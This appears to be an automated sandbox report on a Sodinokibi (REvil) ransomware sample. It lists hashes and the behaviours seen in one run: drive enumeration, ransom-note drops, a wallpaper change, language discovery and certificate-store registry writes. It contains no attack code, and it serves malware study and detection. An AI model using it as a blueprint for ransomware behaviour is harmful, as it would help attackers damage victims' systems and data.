Malware Analysis Report

2025-01-18 18:28

Sample ID 241223-1h2bvaslgk
Target JaffaCakes118_c324b74a5fb1fdf9e34780cf3f6079b23cf3b2e52b422cf760d8bee7090b3e72
SHA256 c324b74a5fb1fdf9e34780cf3f6079b23cf3b2e52b422cf760d8bee7090b3e72
Tags
sodinokibi $2a$10$3aloagguasu5qrj8y1pyzeu93mmqzm6yvgd7yb83at6o21pmw2lcu 51 discovery ransomware
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

c324b74a5fb1fdf9e34780cf3f6079b23cf3b2e52b422cf760d8bee7090b3e72

Threat Level: Known bad

The file JaffaCakes118_c324b74a5fb1fdf9e34780cf3f6079b23cf3b2e52b422cf760d8bee7090b3e72 was found to be: Known bad.

Malicious Activity Summary

sodinokibi $2a$10$3aloagguasu5qrj8y1pyzeu93mmqzm6yvgd7yb83at6o21pmw2lcu 51 discovery ransomware

Sodinokibi family

Sodin,Sodinokibi,REvil

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in System32 directory

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Unsigned PE

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-23 21:39

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-23 21:39

Reported

2024-12-23 21:42

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe"

Signatures

Sodin,Sodinokibi,REvil

ransomware sodinokibi

Sodinokibi family

sodinokibi

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\K: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\M: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\O: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\Y: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\A: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\J: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\X: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\V: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\W: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\I: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\N: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\P: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\S: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\T: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\U: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\E: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\H: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\L: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\Q: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\R: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\B: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened (read-only) | \??\G: | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5s39a8627w.bmp" | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | \??\c:\program files\w7ld957-readme.txt | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File created | \??\c:\program files (x86)\w7ld957-readme.txt | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\DismountTest.3g2 | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\RemoveResume.emf | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\SendDeny.rm | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\TestMove.m4a | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\BlockDisable.TS | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\HideConfirm.mhtml | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\PopRequest.bmp | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\ResizeStop.otf | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\RestartRedo.xlsx | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\RestoreRedo.mht | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\SkipSelect.asx | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\SyncClear.wax | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\DismountComplete.contact | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\EditConvertFrom.M2T | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\InstallComplete.cfg | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\WatchEnable.html | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\ConnectDisconnect.fon | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\ConvertToUnlock.snd | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\RestoreMove.xlsx | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\WriteCompress.ogg | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\ConnectSelect.mpe | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\ReceiveOptimize.mpg | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\RedoUndo.asf | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\SelectReceive.pcx | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\SubmitConfirm.mpe | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\SkipMeasure.jpeg | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\FormatMeasure.vstx | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\InitializeRestore.bmp | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\ShowGrant.wmx | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\UninstallRedo.xltm | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\DenyUnlock.vsd | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\InstallStart.xlsb | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\MountRead.htm | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\NewInitialize.wma | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\UnprotectUnpublish.ogg | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
File opened for modification | \??\c:\program files\UnpublishWatch.xlsx | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c0000000100000004000000001000000400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c
6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd36
34470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = [blob value not preserved in this copy of the report] C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob value not preserved in this copy of the report] C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob value not preserved in this copy of the report] C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = [blob value not preserved in this copy of the report] C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a
93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3
e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186819000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a
16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob value not preserved in this copy of the report] C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob value not preserved in this copy of the report] C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
